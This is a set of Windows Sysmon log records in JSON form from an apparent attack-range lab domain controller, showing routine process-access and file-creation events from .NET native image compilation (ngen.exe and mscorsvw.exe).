{"EventTime":"2020-08-01 05:58:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6597,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:14.401\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0476-5F25-0000-0010A9820C00}\r\nTargetProcessId: 1328\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:14.401","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0476-5F25-0000-0010A9820C00}","TargetProcessId":"1328","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6598,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:14.401\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0476-5F25-0000-0010A9820C00}\r\nTargetProcessId: 1328\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:14.401","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0476-5F25-0000-0010A9820C00}","TargetProcessId":"1328","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6599,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:14.464\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0476-5F25-0000-0010E4860C00}\r\nTargetProcessId: 3304\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:14.464","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0476-5F25-0000-0010E4860C00}","TargetProcessId":"3304","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6600,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:14.464\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0476-5F25-0000-0010E4860C00}\r\nTargetProcessId: 3304\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:14.464","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0476-5F25-0000-0010E4860C00}","TargetProcessId":"3304","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6601,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:14.480\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0476-5F25-0000-0010E4860C00}\r\nTargetProcessId: 3304\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:14.480","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0476-5F25-0000-0010E4860C00}","TargetProcessId":"3304","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:17","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6602,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:17.058\r\nProcessGuid: {A837DB8D-0476-5F25-0000-0010E4860C00}\r\nProcessId: 3304\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ce8-0\\Microsoft.ActiveDirectory.Management.dll\r\nCreationUtcTime: 2020-08-01 05:58:17.058","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:17.058","ProcessGuid":"{A837DB8D-0476-5F25-0000-0010E4860C00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ce8-0\\Microsoft.ActiveDirectory.Management.dll","CreationUtcTime":"2020-08-01 05:58:17.058","EventReceivedTime":"2020-08-01 05:58:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:17","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6603,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:17.151\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0479-5F25-0000-0010248E0C00}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:17.151","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0479-5F25-0000-0010248E0C00}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:17","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6604,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:17.151\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0479-5F25-0000-0010248E0C00}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:17.151","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0479-5F25-0000-0010248E0C00}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:17","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6605,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:17.151\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0479-5F25-0000-0010248E0C00}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:17.151","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0479-5F25-0000-0010248E0C00}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
